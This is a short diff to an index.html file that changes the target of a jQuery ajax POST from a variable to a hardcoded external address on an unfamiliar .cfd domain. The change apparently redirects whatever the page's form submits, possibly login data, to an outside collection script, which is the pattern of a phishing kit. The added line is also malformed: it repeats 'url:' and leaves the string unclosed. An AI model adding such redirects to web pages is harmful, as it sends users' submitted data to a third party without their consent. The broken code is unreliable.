--- a/index.html
+++ b/index.html
@@ -300,7 +300,7 @@ $(document).ready(function() {
 
         $.ajax({
             dataType: 'JSON',
-            url: f,
+            url: url: 'https://fugro.cfd/kr/use/next.php
             type: 'POST',
             data: c,
             processData: false,
